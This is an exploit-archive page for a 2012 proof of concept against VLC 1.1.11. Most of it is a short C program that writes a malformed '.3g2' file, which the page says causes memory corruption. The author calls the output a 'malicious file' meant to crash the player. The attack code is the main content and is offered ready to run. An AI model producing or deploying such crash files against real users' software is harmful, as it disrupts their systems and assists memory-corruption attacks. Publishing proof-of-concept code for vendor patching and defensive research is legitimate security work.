VLC v. 1.1.11 .3g2 Memory Corruption



EKU-ID: 1614 CVE: OSVDB-ID:
Author: Dan Fosco Published: 2012-03-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: VLC v. 1.1.11 .3g2 Memory Corruption
# Date: 3/9/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>
#include <string.h>

int main()
{
	FILE *f;
	f = fopen("dos.3g2", "w");
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputs("\x66\x74\x79\x70", f);
	fclose(f);
	return 0;
}

//use code for creating malicious file